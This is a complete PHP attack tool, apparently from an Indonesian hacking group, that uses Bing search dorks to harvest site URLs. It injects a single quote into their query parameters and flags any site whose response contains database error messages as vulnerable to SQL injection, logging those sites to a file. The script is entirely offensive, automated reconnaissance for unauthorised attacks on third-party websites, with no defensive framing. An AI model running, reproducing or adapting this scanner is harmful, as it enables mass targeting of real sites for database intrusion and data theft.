Sqli.php

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4. @ini_set('memory_limit', '64M');
5. @header('Content-Type: text/html; charset=UTF-8');
6.  
7. function cover() {
8.     print " ******        SQL Scanner via Bing Dorker         ******\n";
9.     print " *****      Coded by l0c4lh34rtz - IndoXploit       *****\n";
10.     print " ****  Sanjungan Jiwa - Jancok Sec - Res7ock Crew    ****\n";
11.     print " ***          usage: php sql.php 'bing_dork'          ***\n";
12.     print " **    ex: php sql.php '\"page.php?id=1\" site:it'       **\n\n";
13. }
14. $error[] = 'You have an error in your SQL';
15. $error[] = 'supplied argument is not a valid MySQL result resource in';
16. $error[] = 'Division by zero in';
17. $error[] = 'Call to a member function';
18. $error[] = 'Microsoft JET Database';
19. $error[] = 'ODBC Microsoft Access Driver';
20. $error[] = 'Microsoft OLE DB Provider for SQL Server';
21. $error[] = 'Unclosed quotation mark';
22. $error[] = 'Microsoft OLE DB Provider for Oracle';
23. $error[] = 'Incorrect syntax near';
24. $error[] = 'SQL query failed';
25. $error[] = 'Warning: filesize()';
26. $error[] = 'Warning: preg_match()';
27. $error[] = 'Warning: array_merge()';
28. $error[] = 'Warning: mysql_query()';
29. $error[] = 'Warning: mysql_num_rows()';
30. $error[] = 'Warning: session_start()';
31. $error[] = 'Warning: getimagesize()';
32. $error[] = 'Warning: mysql_fetch_array()';
33. $error[] = 'Warning: mysql_fetch_assoc()';
34. $error[] = 'Warning: is_writable()';
35. $error[] = 'Warning: Unknown()';
36. $error[] = 'Warning: mysql_result()';
37. $error[] = 'Warning: pg_exec()';
38. $error[] = 'Warning: require()';
39.  
40. function getsource($url) {
41.     $curl = curl_init($url);
42.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
43.     $content = curl_exec($curl);
44.     curl_close($curl);
45.     return $content;
46. }
47. function inject($url) {
48.     $data = getsource(str_replace("=", "='", $url));
49.     $errors = implode("|", $GLOBALS['error']);
50.     return preg_match("#{$errors}#i", $data);
51. }
52. function simpen($isi) {
53.     $f = fopen("result_sql.txt","a+");
54.     fwrite($f, "$isi \n");
55.     fclose($f);
56. }
57.  
58. $do = urlencode($argv[1]);
59. if(isset($argv[1])) {
60.     cover();
61.     $npage = 1;
62.     $npages = 30000;
63.     $allLinks = array();
64.     $lll = array();
65.     while($npage <= $npages) {
66.         $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
67.         if($x) {
68.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
69.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
70.             $npage = $npage + 10;
71.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
72.         } else break;
73.     }
74.     foreach($allLinks as $url) {
75.         $urls = parse_url($url, PHP_URL_HOST);
76.         $urls = "http://$urls/";
77.         if($_SESSION[$urls]) {
78.             //
79.         } else {
80.             $_SESSION[$urls] = "1";
81.             if(inject($url)) {
82.                 print " $url -> Vuln!!\n";
83.                 simpen($url);
84.             }
85.         }
86.     }
87. } else {
88.     print "usage: php ".$argv[0]." 'bing_dork'\n";
89.     print "ex: php ".$argv[0]." '\"page.php?id=1\" site:it'\n";
90. }
91. ?>